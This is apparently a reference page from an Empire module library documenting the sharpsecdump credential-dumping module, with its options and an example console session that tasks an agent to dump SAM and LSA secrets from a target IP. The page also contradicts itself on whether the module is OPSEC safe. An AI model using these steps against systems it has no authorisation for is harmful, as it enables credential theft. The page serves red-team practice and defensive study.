Invoke-SharpSecDump - Empire Module


This page contains detailed information about how to use the powershell/credentials/sharpsecdump Empire module. For list of all Empire modules, visit the Empire Module Library.

Module Overview


Name: Invoke-SharpSecDump
Module: powershell/credentials/sharpsecdump
Source code [1]: empire/server/modules/powershell/credentials/sharpsecdump.yaml
Source code [2]: empire/server/data/module_source/credentials/Invoke-SharpSecDump.ps1
MITRE ATT&CK: T1003
Language: PowerShell
Needs admin: No
OPSEC safe: Yes
Background: No

.Net port of the remote SAM + LSA Secrets dumping functionality of impacket's secretsdump.py. By default runs in the context of the current user.

This module runs in a foreground and is OPSEC unsafe as it writes on the disk and therefore could be detected by AV/EDR running on the target system.

Note that the sharpsecdump module does not need administrative privileges to work properly which means that a normal user can run this module.

Required Module Options


This is a list of options that are required by the sharpsecdump module:

Agent
Agent to run on.

Target
Comma seperated list of IP''s / hostnames to scan. Please don''t include spaces between addresses. Can also dump hashes on the local system by setting target to 127.0.0.1.

Additional Module Options


This is a list of additional options that are supported by the sharpsecdump module:

Domain
Domain to use, if you want to use alternate credentials to run (. for local domain). Must use with -u and -p flags.

Password
Plaintext password to use, if you want to use alternate credentials to run. Must use with -u and -d flags.

Threads
Threads to use to concurently enumerate multiple remote hosts.
Default value: 10.

Username
Username to use, if you want to use alternate credentials to run. Must use with -p and -d flags, Misc).

Sharpsecdump Example Usage


Here's an example of how to use the sharpsecdump module in the Empire client console:

[+] New agent Y4LHEV83 checked in
[*] Sending agent (stage 2) to Y4LHEV83 at 192.168.204.135
(empire usestager/windows/ducky) > usemodule powershell/credentials/sharpsecdump

 Author       @G0ldenGunSec                                                      
              @S3cur3Th1sSh1t                                                    
 Background   False                                                              
 Comments     https://github.com/G0ldenGunSec/SharpSecDump                       
 Description  .Net port of the remote SAM + LSA Secrets dumping functionality of 
              impacket's secretsdump.py. By default runs in the context of the   
              current user.                                                      
 Language     powershell                                                         
 Name         powershell/credentials/sharpsecdump                                
 NeedsAdmin   False                                                              
 OpsecSafe    True                                                               
 Techniques   http://attack.mitre.org/techniques/T1003                           


,Record Options----,----------,-------------------------------------,
| Name     | Value | Required | Description                         |
|----------|-------|----------|-------------------------------------|
| Agent    |       | True     | Agent to run on.                    |
|----------|-------|----------|-------------------------------------|
| Domain   |       | False    | Domain to use, if you want to use   |
|          |       |          | alternate credentials to run (. for |
|          |       |          | local domain). Must use with -u and |
|          |       |          | -p flags                            |
|----------|-------|----------|-------------------------------------|
| Password |       | False    | Plaintext password to use, if you   |
|          |       |          | want to use alternate credentials   |
|          |       |          | to run. Must use with -u and -d     |
|          |       |          | flags                               |
|----------|-------|----------|-------------------------------------|
| Target   |       | True     | Comma seperated list of IP''s /     |
|          |       |          | hostnames to scan. Please don''t    |
|          |       |          | include spaces between addresses.   |
|          |       |          | Can also dump hashes on the local   |
|          |       |          | system by setting target to         |
|          |       |          | 127.0.0.1                           |
|----------|-------|----------|-------------------------------------|
| Threads  | 10    | False    | Threads to use to concurently       |
|          |       |          | enumerate multiple remote hosts     |
|----------|-------|----------|-------------------------------------|
| Username |       | False    | Username to use, if you want to use |
|          |       |          | alternate credentials to run. Must  |
|          |       |          | use with -p and -d flags, Misc)     |
'----------'-------'----------'-------------------------------------'

(Empire: usemodule/powershell/credentials/sharpsecdump) > set Agent Y4LHEV83
[*] Set Agent to Y4LHEV83
(Empire: usemodule/powershell/credentials/sharpsecdump) > set Target 192.168.100.1
[*] Set Target to 192.168.100.1
(Empire: usemodule/powershell/credentials/sharpsecdump) > execute
[*] Tasked Y4LHEV83 to run Task 1
...

Now wait for the results to come.

Authors


References


See Also


Check also the following modules related to this module:

Version


This page has been created based on Empire version 4.1.3 (BC Security Fork).
Visit Empire Module Library for more modules.